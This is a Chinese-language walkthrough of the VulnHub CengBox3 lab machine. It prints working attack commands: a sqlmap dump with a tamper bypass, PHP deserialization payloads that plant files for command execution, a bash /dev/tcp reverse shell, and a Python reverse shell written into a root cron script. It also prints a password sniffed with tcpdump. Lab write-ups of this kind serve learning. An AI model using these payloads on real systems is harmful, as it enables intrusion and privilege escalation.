vulnhub靶场之CengBox3

1.信息收集

输入命令：netdiscover -i eth0 -r 192.168.239.0 ，发现181机器存活

输入命令nmap -p- -sV -O -Pn -A 192.168.239.181 ，进行端口探测，发现存在22、80、443端口，还发现存在域名ceng-company.vm。

将域名ceng-company.vm绑定在/etc/hosts文件中，再到浏览器上访问ceng-company.vm，发现是Agency网站。

使用命令searchsploit Agency，搜索存在的历史命令，，查看源码未发现版本信息，逐个尝试未成功。

进行目录扫描：gobuster dir -u http://ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x .zip,.php,.txt,.html,.rar,.php.bak，发现存在poem.txt文件，打开未发现可利用

进行域名扫描：gobuster vhost --append-domain -u ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"，发现存在dev.ceng-company.vm

浏览器访问，发现是一个登录页面。

抓包，进行sqlmap注入探测，发现存在sql注入漏洞

2.漏洞利用

在获取数据库的时候，发现获取不到，猜测有过滤，看到sqlmap提示字符“>”似乎是由后端服务器过滤，使用–tamper=between进行绕过。

输入命令：sqlmap -r sql.txt --random-agent --batch --level 3 --risk 3 -D MySql --tamper=between -D cengbox -T users -C "login,name,password" --dump，来获取用户名与密码。

添加评论，发现PHP序列号，猜测存在PHP反序列化漏洞

data=O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:22:"/var/www/html/poem.txt";s:8:"poemName";s:4:"1345";}s:9:"poemLines";s:3:"789";}

构造POC：O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:22:"/var/www/html/pin1.php";s:8:"poemName";s:19:"";}s:9:"poemLines";s:3:"789";}（需要经过url编码），利用成功。

构造命令执行的exp：O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:21:"/var/www/html/cmd.php";s:8:"poemName";s:27:"";}s:9:"poemLines";s:3:"789";}（需要经过url编码），执行命令成功。

3.提权

反弹shell，bash -c "exec bash -i &>/dev/tcp/192.168.239.131/1234 <&1"


上传pspy64s，进行信息收集，发现存在login.py。

因为是定时执行的任务，目标主机又安装有tcpdump，故使用tcpdump来抓取目标主机的流量，抓取3分钟左右。


将抓取到的流量下载到本地上，并使用strings进行查看，发现用户eric的密码为：3ricThompson*Covid19

切换到eric，往login.py文件中写入反弹，并监听端口，反弹成功，权限为root。

echo "'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.239.131",1478));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'" > login.py